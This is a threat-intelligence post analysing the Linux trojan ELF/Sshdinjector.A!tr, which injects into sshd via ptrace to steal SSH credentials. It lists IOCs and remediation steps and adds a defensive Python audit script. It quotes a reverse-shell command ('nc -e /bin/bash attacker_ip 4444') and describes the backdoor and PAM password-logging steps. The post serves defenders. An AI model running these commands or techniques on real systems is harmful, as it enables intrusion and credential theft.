New malware targets Linux systems and IoT devices

Overview

ELF/Sshdinjector.A!tr is a Linux trojan designed to inject malicious code into the SSH process (sshd), steal login credentials, and create a backdoor for hackers. Samples of this malware were primarily detected in mid-November 2024.

Description

  • Type: Trojan

  • Full Name: ELF/Sshdinjector.A!tr

  • Target: Linux operating system

  • Infection Method:

    • Exploits security vulnerabilities on Linux systems

    • Infects via SSH by stealing credentials

    • Injected into legitimate processes like sshd to hide itself

Technical Attack Details

  • Although the initial infection vector is not documented in detail, ELF/Sshdinjector.A!tr is reported to spread in three main ways:

    • Exploiting security vulnerabilities: the malware can exploit unpatched vulnerabilities on Linux systems; two CVEs are noted:

      • CVE-2021-3156 - privilege escalation vulnerability in sudo.

      • CVE-2019-12735 (Vim & Neovim) - remote code execution vulnerability via a .vimrc file.

    • Brute-forcing SSH: if the system uses weak passwords, the trojan guesses them to gain access to the root account.

    • Infection through malicious software: installed via fake software packages or dropped by third-party malware.

  • Once on the system, the trojan injects its code into the sshd process (the SSH daemon). Living inside a legitimate, long-running service lets it blend in and avoid detection. Attaching to a root-owned sshd requires root (or CAP_SYS_PTRACE), which is why the privilege escalation above precedes this stage. The injection uses ptrace() to attach to sshd and read its memory:

    • ptrace(PTRACE_ATTACH, target_pid, NULL, NULL): attach to the sshd process.

    • PTRACE_PEEKDATA: read data from the process's memory (for example, to retrieve login credentials).

    • PTRACE_DETACH: detach from the process once the data has been read.

  • From then on, whenever a user authenticates over SSH, the malware records the login credentials and sends them to the command-and-control (C2) server at 45.125.64[.]200.

  • After the code has been injected into sshd, the attacker establishes a backdoor to maintain access to the system. The trojan sets up the backdoor by:

    • Modifying the ~/.ssh/authorized_keys file to add the attacker's SSH key.

    • Changing sshd_config to allow remote root login.

    • Setting up a cron job or rootkit so the implant restarts after being shut down.

  • In addition, the malware can modify the PAM configuration file /etc/pam.d/sshd so that passwords are logged during authentication.

  • The malware then creates a script, logger.sh, to record the passwords:

  • Once persistent access is in place, the attacker opens reverse shells to send data back to the C2 server using "nc -e /bin/bash attacker_ip 4444". Alternatively, a Python script serves the same purpose.

  • Finally, the attackers take steps to evade detection on the victim's system. Measures recorded in this campaign include:

    • Hiding malicious processes by renaming them to impersonate legitimate processes.

    • Disabling firewalls and security software when root access is available.

    • Using rootkit techniques to conceal their activity.

Impact of ELF/Sshdinjector.A!tr

ELF/Sshdinjector.A!tr is a dangerous Linux trojan that mainly infects systems through SSH. Once a system is infected, the trojan can steal information, create backdoors, slow the system down, or even turn the server into a botnet node. The major impacts recorded for this malware are:

  • Theft of SSH login credentials

  • Installation of backdoors to maintain control

  • Abuse of server resources for cryptocurrency mining (cryptojacking)

  • Use of the server in a botnet for DDoS attacks

  • Alteration of system files and destruction of data

  • Spread to other systems as an SSH worm

IOC

  1. IP:

    • 45.125.64[.]200

  2. Hash (SHA-256):

    • 94e8540ea39893b6be910cfee0331766e4a199684b0360e367741facca74191f

    • 0e2ed47c0a1ba3e1f07711fb90ac8d79cb3af43e82aa4151e5c7d210c96baebb

    • 6d08ba82bb61b0910a06a71a61b38e720d88f556c527b8463a11c1b68287ce84

Recommendations

If you suspect a system is infected with ELF/Sshdinjector.A!tr, take the following actions:

  1. Check the SSH process

    • ps aux | grep sshd

    • If an sshd process is running from an unexpected directory such as /tmp/ or /var/tmp/, stop it immediately with the command below. Because a renamed process can pass the ps check, also confirm that the exe link under /proc/<PID>/ points to the genuine sshd binary.

      • kill -9 <PID>

  2. Scan the system for malware

    • Install rkhunter and chkrootkit: sudo apt install rkhunter chkrootkit -y

    • Run the programs and perform a scan:

      • sudo rkhunter --check

      • sudo chkrootkit

  3. Check for unknown accounts and delete them immediately

    • cat /etc/passwd | grep bash

    • If you find an account you do not recognise, delete it with: sudo userdel -r <username>

  4. Reinstall SSH if it has been replaced

    • sudo apt reinstall openssh-server

  5. Restrict SSH access by IP

    • sudo ufw allow from <your IP address> to any port 22
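
The check in step 1 above, together with the persistence indicators listed under Technical Attack Details (a ptrace() tracer attached to sshd, PermitRootLogin switched on in sshd_config, an authorized_keys entry nobody approved), as an added Python audit. This is example code, not from the original post or from FortiGuard's analysis; file contents are passed in as strings so the same functions work on a live host or on collected copies, and the function names and sample data are constructed.

```python
"""Defender-side checks for the sshd-injection indicators described above.
Added example, not code from the original post or FortiGuard's analysis;
file contents are passed in as strings; sample inputs below are constructed."""
import re


def tracer_pid(proc_status: str) -> int:
    """TracerPid from /proc/<pid>/status. A non-zero value on an sshd
    process means something (e.g. PTRACE_ATTACH) is attached to it."""
    m = re.search(r"^TracerPid:\s*(\d+)", proc_status, re.M)
    return int(m.group(1)) if m else 0


def effective_permit_root_login(sshd_config: str) -> str:
    """sshd honours the first uncommented PermitRootLogin directive; the
    compiled-in default is prohibit-password. 'yes' is the indicator here."""
    for raw in sshd_config.splitlines():
        parts = raw.split("#", 1)[0].split()
        if len(parts) >= 2 and parts[0].lower() == "permitrootlogin":
            return parts[1].lower()
    return "prohibit-password"


def unknown_authorized_keys(authorized_keys: str, approved: set) -> list:
    """Key blobs in authorized_keys that are not in the approved set.
    Handles an options prefix (e.g. command="...") before the key type."""
    unknown = []
    for raw in authorized_keys.splitlines():
        fields = raw.split()
        if not fields or fields[0].startswith("#"):
            continue
        for i, f in enumerate(fields[:-1]):
            if f.startswith(("ssh-", "ecdsa-", "sk-")):
                if fields[i + 1] not in approved:
                    unknown.append(fields[i + 1])
                break
    return unknown


# Constructed sample data standing in for the live files.
SAMPLE_STATUS = "Name:\tsshd\nState:\tt (tracing stop)\nTracerPid:\t4242\n"
SAMPLE_SSHD_CONFIG = "#PermitRootLogin no\nPermitRootLogin yes\nPermitRootLogin no\n"
SAMPLE_KEYS = ('ssh-ed25519 AAAAC3KnownAdminKey admin@host\n'
               'command="/bin/sh" ssh-rsa AAAAB3UnknownKey x\n')
APPROVED = {"AAAAC3KnownAdminKey"}

if __name__ == "__main__":
    print("TracerPid:", tracer_pid(SAMPLE_STATUS))
    print("PermitRootLogin:", effective_permit_root_login(SAMPLE_SSHD_CONFIG))
    print("unknown keys:", unknown_authorized_keys(SAMPLE_KEYS, APPROVED))
```

On a live host, feed the functions the contents of /proc/<pid>/status for each sshd PID, /etc/ssh/sshd_config and each user's authorized_keys file; any non-zero TracerPid, a value of "yes" or an unapproved key is worth investigating.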

Conclusion

ELF/Sshdinjector.A!tr is an extremely dangerous trojan capable of stealing SSH information, creating backdoors, and sending data to hackers. If you suspect your system is infected, immediately isolate it, check the sshd process, scan for rootkits, and update the system.

FPT IS Security

761 posts

Dedicated to providing insightful articles on cybersecurity threat intelligence, aimed at empowering individuals and organizations to navigate the digital landscape safely.